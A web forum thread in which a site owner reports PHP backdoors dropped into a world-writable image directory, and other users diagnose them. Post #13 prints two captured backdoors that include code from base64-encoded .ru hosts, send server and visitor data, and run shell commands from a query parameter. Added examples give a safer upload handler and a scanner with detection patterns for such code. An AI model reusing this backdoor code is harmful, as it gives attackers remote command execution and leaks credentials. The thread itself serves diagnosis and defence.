#1
PHP Webserver Attack (What is this?)
Our webserver is under attack... it came from several different IPs. They uploaded several randomly named PHP files to an image directory that was CHMODed 777, with names like report.php, date.php, etc. This is the content of the files:
PHP Code:
/doom3.&.iso.htm /uploader.briana.banks.html etc., etc., etc.
What type of attack is this and what is the best way to stop it? Thanks...
Last edited by NogDog; 11-05-2005 at 03:38 PM.
#2
Sounds like you have an anonymous FTP account, or an account that someone got into and started playing around with.
#3
Quote:
#4
It attempts to include a file from http://user9.mshtml.ru/, and if that fails then one from http://user7.htmltags.ru/. It appends a bunch of stuff about your server to the URL. What it does with that info I do not know, as I don't have access to those files.
I would contact your web host provider to see if they can/want to take any action, and in the meantime make sure you change all your passwords (using high-security ones with upper and lower case plus numbers and underscores/hyphens) and make sure anonymous FTP is disabled.
#5
Yep, and change passwords once in a while.
#6
It looks to me like someone is using your account to distribute warez.
If it was client-side hacking, you should REALLY consider improving security and validation in your scripts.
#7
And if you do have an upload script, check whether it limits what can be uploaded. Some upload scripts allow, for example, all kinds of files, so some 'bad' people can upload a .php or .html file which they can then 'execute' and retrieve information with.
Good luck, 3Pinter
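As an added example, not code from this thread or from any poster, here is the kind of restrictive upload handler post #7 is asking for. It validates the file by its bytes rather than by the name or Content-Type the browser sent, stores it under a server-chosen name with a server-chosen extension, and assumes a target directory that is not world-writable. The function names, the form field name `img` and the `images` directory are assumptions of this example; it needs PHP 7 or later for `random_bytes`.

```php
<?php
// Added example (not code from the thread): a restrictive image upload handler.
// Assumptions: the form field is named "img" and files go to an "images"
// directory that is NOT world-writable and does not execute PHP.
declare(strict_types=1);

// Detected MIME type => extension the server will write. The client's filename
// and Content-Type are never consulted.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_UPLOAD_BYTES = 2 * 1024 * 1024;

/**
 * Validate one $_FILES entry and return the extension to store it under.
 * Throws RuntimeException with the reason when the upload must be rejected.
 */
function validate_image_upload(array $file, int $maxBytes = MAX_UPLOAD_BYTES): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload missing or failed (code ' . ($file['error'] ?? 'n/a') . ')');
    }
    // Only files PHP received in this request; rejects a forged tmp_name path.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if (filesize($file['tmp_name']) > $maxBytes) {
        throw new RuntimeException('file too large');
    }
    // Sniff the bytes: shell.php renamed to shell.jpg fails here.
    $info = getimagesize($file['tmp_name']);
    if ($info === false || !isset(ALLOWED_IMAGE_TYPES[$info['mime']])) {
        throw new RuntimeException('not a permitted image type');
    }
    // A "GIF89a<?php ..." polyglot still passes this check; that is why the
    // target directory must not execute PHP and the extension is ours, not the user's.
    return ALLOWED_IMAGE_TYPES[$info['mime']];
}

/**
 * Move a validated upload into $dir under a random server-generated name
 * and return that name. No user-controlled string reaches the path.
 */
function store_image_upload(array $file, string $dir): string
{
    $ext  = validate_image_upload($file);
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);   // readable by the web server, never executable
    return $name;
}

// In the (authenticated) admin page that receives the form:
if (isset($_FILES['img'])) {
    try {
        $stored = store_image_upload($_FILES['img'], __DIR__ . '/images');
        echo 'stored as ' . htmlspecialchars($stored);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ' . htmlspecialchars($e->getMessage());
    }
}
```

Content sniffing alone does not stop a polyglot (a valid GIF header followed by PHP), so the controls that actually matter are that the stored name and extension come from the server, that the directory is 0755 and owned by the web server user rather than 777, and that PHP is switched off for that directory (with mod_php, `php_flag engine off` in that directory's Apache configuration; with PHP-FPM, no PHP handler mapped for that location).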
#8
I have an upload script (limited to JPEGs only) but it is in an administration area that is guarded by apache authentication and as far as I can tell nobody has been in there. This was a pretty much instantaneous attack (I know who did it and what provoked it). Is it possible to upload to a CHMOD 777 directory without a script? Also, these were the only files uploaded.. the URLs I included do not exist... those scripts pick them up and redirect to that base64 encoded page.
#9
I don't really understand. If you have the IPs of the offender you must also know which of your scripts was used for the upload or include.
#10
If the directory is chmod 777, they can use FTP anonymously to upload/download files.
#11
I'm curious, do you have Mambo installed on your server? I've had this same hack on two of my shared hosting plans, all sites have a slightly outdated version of Mambo. I've even seen some Mambo components installed such as "com_moschat", that I haven't installed. I've had the same strange .php files created, referencing the same domains. I'm wondering if it has something to do with a Mambo exploit.
#12
Me too
This happened to my site and a client site. Man, I wish there was something that could be done about this!!!!!!!! These Fukcers need to be stopped.
#13
Here is some of the code. I'm hoping this gets out to the search engines.

```php
<?php
error_reporting(0);
// Optional credentials posted as l/p are forwarded to the controller; when
// "input" is also set they are base64/md5-encoded first.
if (isset($_POST["l"]) and isset($_POST["p"])) {
    if (isset($_POST["input"])) {
        $user_auth = "&l=" . base64_encode($_POST["l"]) . "&p=" . base64_encode(md5($_POST["p"]));
    } else {
        $user_auth = "&l=" . $_POST["l"] . "&p=" . $_POST["p"];
    }
} else {
    $user_auth = "";
}
if (!isset($_POST["log_flg"])) {
    $log_flg = "&log";
}
// The base64 literal decodes to http://bis.iframe.ru/master.php?r_addr=
// so this is a remote include, with the visitor's IP, the requested URL and
// any credentials appended. REMOTE_ADDR and REQUEST_URI are undefined constants,
// which PHP before 8 falls back to treating as the strings themselves.
if (! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9")
        . sprintf("%u", ip2long(getenv(REMOTE_ADDR)))
        . "&url=" . base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI])
        . $user_auth . $log_flg)) {
    // Fallback when the remote include fails: run any shell command passed in
    // the a3kfj39fsj2 query parameter, or report the kernel version via uname.
    if (isset($_GET["a3kfj39fsj2"])) {
        system($_GET["a3kfj39fsj2"]);
    }
    if ($_POST["l"] == "special") {
        print "sys_active" . `uname -a`;
    }
}
?>
```

Another file has this code:

```php
<?
error_reporting(0);
$s = "k";
// Collect request details, falling back to register_globals-era variable names.
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
// Everything base64-encoded and dot-joined into the query string sent to the controller.
$str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d)
     . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".$s";
// "aHR0cDovLw==" is "http://", "dXNlcjkubXNodG1sLnJ1" is "user9.mshtml.ru" and
// "dXNlcjcuaHRtbHRhZ3MucnU=" is "user7.htmltags.ru": include from the first host,
// fall back to the second if that fails.
if ((include(base64_decode("aHR0cDovLw==") . base64_decode("dXNlcjkubXNodG1sLnJ1") . "/?" . $str))) {
} else {
    include(base64_decode("aHR0cDovLw==") . base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=") . "/?" . $str);
}
?>
```
#14
It's not good, whatever they are doing. First off, it's from somewhere in Russia, so that's immediately bad. The other thing is that they are trying to execute the command line `uname -a`, which outputs a single line with the name of the machine and the operating system version. They are doing their homework before they attack. I would check your processing power and see if it has skyrocketed; they may have anything on the server now. If so, it's time for a rebuild.
Why do you have a 777 dir anyway...
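An added triage helper, not from the thread or from any poster: it looks for the indicators visible in the two files posted in #13 (an include of a base64-decoded URL, a shell command read from the request, backtick execution, errors silenced at the top of the file), decodes the base64 literals so the real hostnames show up in the report, and while walking the tree lists world-writable directories like the 777 image directory post #14 asks about. The indicator patterns, function names and the constructed sample file are assumptions of this example, not anything the attackers' code or the forum supplies.

```php
<?php
// Added example (not code from the thread): triage scanner for dropped PHP
// backdoors of the kind shown in post #13, plus a listing of world-writable
// directories (the 777 case from post #14). Indicator patterns, function
// names and the constructed sample file below are assumptions of this example.
declare(strict_types=1);

// Regex => what a match means. Tuned to the two posted files, so it is a
// starting point for triage, not a complete signature set.
const INDICATORS = [
    '/\b(include|include_once|require|require_once)\s*\(?\s*base64_decode\s*\(/i'
        => 'include of a base64-decoded (remote) URL',
    '/\b(system|exec|passthru|shell_exec|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b/i'
        => 'shell command taken from request parameters',
    '/`[^`\n]*\b(uname|id|whoami|wget|curl)\b[^`\n]*`/'
        => 'backtick shell execution',
    '/\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(/i'
        => 'eval of an obfuscated payload',
];

/** Decode base64 string literals (8+ chars) that yield printable text, so real URLs appear in the report. */
function decode_base64_literals(string $src): array
{
    $out = [];
    if (preg_match_all('/["\']([A-Za-z0-9+\/]{8,}={0,2})["\']/', $src, $m)) {
        foreach (array_unique($m[1]) as $lit) {
            $dec = base64_decode($lit, true);
            if ($dec !== false && $dec !== '' && ctype_print($dec)) {
                $out[$lit] = $dec;
            }
        }
    }
    return $out;
}

/** Return the indicator descriptions that match one file's source ([] when clean). */
function scan_source(string $src): array
{
    $hits = [];
    foreach (INDICATORS as $re => $why) {
        if (preg_match($re, $src)) {
            $hits[] = $why;
        }
    }
    // Both posted files open by silencing errors; only worth noting next to other hits.
    if ($hits && preg_match('/^\s*<\?(php)?\s*error_reporting\s*\(\s*0\s*\)/i', $src)) {
        $hits[] = 'silences all errors at the top of the file';
    }
    return $hits;
}

/**
 * Walk $root. Returns
 *   ['files' => [path => ['indicators' => [...], 'decoded' => [literal => text]]],
 *    'world_writable_dirs' => [path, ...]]
 */
function scan_path(string $root): array
{
    $report = ['files' => [], 'world_writable_dirs' => []];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    $dirs = [$root];   // the iterator yields children only, so check the root explicitly
    foreach ($it as $path => $entry) {
        if ($entry->isDir()) { $dirs[] = $path; continue; }
        if (!preg_match('/\.(php\d?|phtml|inc)$/i', $path)) { continue; }
        $src  = (string) file_get_contents($path);
        $hits = scan_source($src);
        if ($hits) {
            $report['files'][$path] = ['indicators' => $hits, 'decoded' => decode_base64_literals($src)];
        }
    }
    foreach ($dirs as $d) {
        if ((fileperms($d) & 0002) !== 0) {   // "other" may write: anyone on the box can drop files
            $report['world_writable_dirs'][] = $d;
        }
    }
    return $report;
}

// Demo on a constructed sample: a temp directory made 777 holding a file shaped
// like the second backdoor from post #13 (the posted code, shortened).
$tmp = sys_get_temp_dir() . '/scan_demo_' . getmypid();
mkdir($tmp);
chmod($tmp, 0777);
file_put_contents($tmp . '/date.php',
    '<? error_reporting(0); if((include(base64_decode("aHR0cDovLw==")'
    . '.base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} ?>');
print_r(scan_path($tmp));
unlink($tmp . '/date.php');
rmdir($tmp);
```

Run it against the document root (`scan_path('/var/www')` or wherever the image directory lives) from a shell, not through the web server, and treat every flagged file as evidence to copy off the box before deleting; the decoded literals are the hostnames to block at the firewall and to hand to the hosting provider.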
#15
Is it not commonplace to 777 image directories?
|
![]() |
| Bookmarks |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | Search this Thread |
| Display Modes | Rate This Thread |
|
|